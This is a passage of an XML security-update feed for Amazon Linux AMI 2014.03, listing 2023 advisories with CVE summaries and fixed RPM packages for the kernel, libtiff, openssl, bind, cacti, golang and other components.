</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3772" title="" id="CVE-2023-3772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39192" title="" id="CVE-2023-39192" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39193" title="" id="CVE-2023-39193" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39194" title="" id="CVE-2023-39194" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4207" title="" id="CVE-2023-4207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4244" title="" id="CVE-2023-4244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42753" title="" id="CVE-2023-42753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-42755" title="" id="CVE-2023-42755" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45871" title="" id="CVE-2023-45871" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4622" title="" id="CVE-2023-4622" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4623" title="" id="CVE-2023-4623" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4921" title="" id="CVE-2023-4921" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.326" release="171.539.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.326" release="171.539.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.326-171.539.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.326" 
release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.326-171.539.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.326" release="171.539.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.326-171.539.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1839</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1839: medium priority package update for libtiff</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-41175:
Multiple potential integer overflows in raw2tiff.c in libtiff <= 4.5.1 can allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted tiff image which triggers a heap-based buffer overflow.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41175" title="" id="CVE-2023-41175" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff" version="4.0.3" release="35.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.49.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.49.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.49.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.49.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.49.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.49.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.49.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.49.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.49.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.49.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.49.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1840</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1840: important priority package update for axis</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-40743:
** UNSUPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** When integrating Apache Axis 1.x in an application, it may not have been obvious that looking up a service through "ServiceFactory.getService" allows potentially dangerous lookup mechanisms such as LDAP. When passing untrusted input to this API method, this could expose the application to DoS, SSRF and even attacks leading to RCE.
As Axis 1 has been EOL we recommend you migrate to a different SOAP engine, such as Apache Axis 2/Java. As a workaround, you may review your code to verify no untrusted or unsanitized input is passed to "ServiceFactory.getService", or by applying the patch from https://github.com/apache/axis-axis1-java/commit/7e66753427466590d6def0125e448d2791723210 . The Apache Axis project does not expect to create an Axis 1.x release fixing this problem, though contributors that would like to work towards this are welcome.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40743" title="" id="CVE-2023-40743" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="axis-javadoc" version="1.2.1" release="7.5.15.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-javadoc-1.2.1-7.5.15.amzn1.noarch.rpm</filename></package><package name="axis" version="1.2.1" release="7.5.15.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-1.2.1-7.5.15.amzn1.noarch.rpm</filename></package><package name="axis-manual" version="1.2.1" release="7.5.15.amzn1" epoch="0" arch="noarch"><filename>Packages/axis-manual-1.2.1-7.5.15.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1841</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1841: medium priority package update for libxml2</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-39615:
Xmlsoft Libxml2 v2.11.0 was discovered to contain a global buffer overflow via the xmlSAX2StartElement() function at /libxml2/SAX2.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via supplying a crafted XML file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39615" title="" id="CVE-2023-39615" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libxml2-python26" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python26-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2-python27" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python27-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.9.1-6.6.43.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.9.1-6.6.43.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.9.1-6.6.43.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.9.1-6.6.43.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.9.1-6.6.43.amzn1.i686.rpm</filename></package><package 
name="libxml2-python27" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python27-2.9.1-6.6.43.amzn1.i686.rpm</filename></package><package name="libxml2-python26" version="2.9.1" release="6.6.43.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python26-2.9.1-6.6.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1842</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1842: important priority package update for cacti</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-39357:
Cacti is an open source operational monitoring and fault management framework. A defect in the sql_save function was discovered. When the column type is numeric, the sql_save function directly utilizes user input. Many files and functions calling the sql_save function do not perform prior validation of user input, leading to the existence of multiple SQL injection vulnerabilities in Cacti. This allows authenticated users to exploit these SQL injection vulnerabilities to perform privilege escalation and remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39357" title="" id="CVE-2023-39357" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="4.22.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-4.22.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1843</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1843: medium priority package update for openssl</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3817:
Issue summary: Checking excessively long DH keys or parameters may be very slow.
Impact summary: Applications that use the functions DH_check(), DH_check_ex()
or EVP_PKEY_param_check() to check a DH key or DH parameters may experience long
delays. Where the key or parameters that are being checked have been obtained
from an untrusted source this may lead to a Denial of Service.
The function DH_check() performs various checks on DH parameters. After fixing
CVE-2023-3446 it was discovered that a large q parameter value can also trigger
an overly long computation during some of these checks. A correct q value,
if present, cannot be larger than the modulus p parameter, thus it is
unnecessary to perform these checks if q is larger than p.
An application that calls DH_check() and supplies a key or parameters obtained
from an untrusted source could be vulnerable to a Denial of Service attack.
The function DH_check() is itself called by a number of other OpenSSL functions.
An application calling any of those other functions may similarly be affected.
The other functions affected by this are DH_check_ex() and
EVP_PKEY_param_check().
Also vulnerable are the OpenSSL dhparam and pkeyparam command line applications
when using the "-check" option.
The OpenSSL SSL/TLS implementation is not affected by this issue.
The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.
CVE-2023-3446:
Issue summary: Checking excessively long DH keys or parameters may be very slow.
Impact summary: Applications that use the functions DH_check(), DH_check_ex()
or EVP_PKEY_param_check() to check a DH key or DH parameters may experience long
delays. Where the key or parameters that are being checked have been obtained
from an untrusted source this may lead to a Denial of Service.
The function DH_check() performs various checks on DH parameters. One of those
checks confirms that the modulus ('p' parameter) is not too large. Trying to use
a very large modulus is slow and OpenSSL will not normally use a modulus which
is over 10,000 bits in length.
However the DH_check() function checks numerous aspects of the key or parameters
that have been supplied. Some of those checks use the supplied modulus value
even if it has already been found to be too large.
An application that calls DH_check() and supplies a key or parameters obtained
from an untrusted source could be vulnerable to a Denial of Service attack.
The function DH_check() is itself called by a number of other OpenSSL functions.
An application calling any of those other functions may similarly be affected.
The other functions affected by this are DH_check_ex() and
EVP_PKEY_param_check().
Also vulnerable are the OpenSSL dhparam and pkeyparam command line applications
when using the '-check' option.
The OpenSSL SSL/TLS implementation is not affected by this issue.
The OpenSSL 3.0 and 3.1 FIPS providers are not affected by this issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3446" title="" id="CVE-2023-3446" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3817" title="" id="CVE-2023-3817" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.2k-16.164.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.2k-16.164.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.2k-16.164.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.2k-16.164.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.2k-16.164.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.2k-16.164.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.2k-16.164.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.2k-16.164.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.2k" release="16.164.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.2k-16.164.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.2k" 
release="16.164.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.2k-16.164.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1844</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1844: medium priority package update for ImageMagick</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-34151:
A vulnerability was found in ImageMagick. This issue occurs as undefined behavior when casting double to size_t in the svg, mvg and other coders.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151" title="" id="CVE-2023-34151" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-perl" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.29.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.29.amzn1" epoch="0" 
arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.29.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1845</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1845: important priority package update for bind</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3341:
The code that processes control channel messages sent to `named` calls certain functions recursively during packet parsing. Recursion depth is only limited by the maximum accepted packet size; depending on the environment, this may cause the packet-parsing code to run out of available stack memory, causing `named` to terminate unexpectedly. Since each incoming control channel message is fully parsed before its contents are authenticated, exploiting this flaw does not require the attacker to hold a valid RNDC key; only network access to the control channel's configured TCP port is necessary.
This issue affects BIND 9 versions 9.2.0 through 9.16.43, 9.18.0 through 9.18.18, 9.19.0 through 9.19.16, 9.9.3-S1 through 9.16.43-S1, and 9.18.0-S1 through 9.18.18-S1.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3341" title="" id="CVE-2023-3341" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.91.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.91.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.91.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1846</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1846: medium priority package update for libtiff</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3316:
A NULL pointer dereference in TIFFClose() is caused by a failure to open an output file (non-existent path or a path that requires permissions like /dev/null) while specifying zones.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3316" title="" id="CVE-2023-3316" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-static" version="4.0.3" release="35.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.46.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.46.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.46.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.46.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.46.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.46.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.46.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.46.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.46.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.46.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.46.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1847</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1847: medium priority package update for libtiff</title><issued date="2023-09-27 22:15:00" /><updated date="2023-10-06 00:52:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-30774:
A vulnerability was found in libtiff library. This security flaw causes a heap buffer overflow issue via TIFFTAG_INKNAMES and TIFFTAG_NUMBEROFINKS values.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30774" title="" id="CVE-2023-30774" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="35.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.47.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.47.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.47.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.47.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.47.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.47.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.47.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.47.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.47.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.47.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.47.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1848</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1848: important priority package update for golang</title><issued date="2023-09-27 22:15:00" /><updated date="2024-01-03 22:37:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-39319:
The html/template package does not apply the proper rules for handling occurrences of "<script", "<!--", and "</script" within JS literals in <script> contexts. This may cause the template parser to improperly consider script contexts to be terminated early, causing actions to be improperly escaped. This could be leveraged to perform an XSS attack.
CVE-2023-29409:
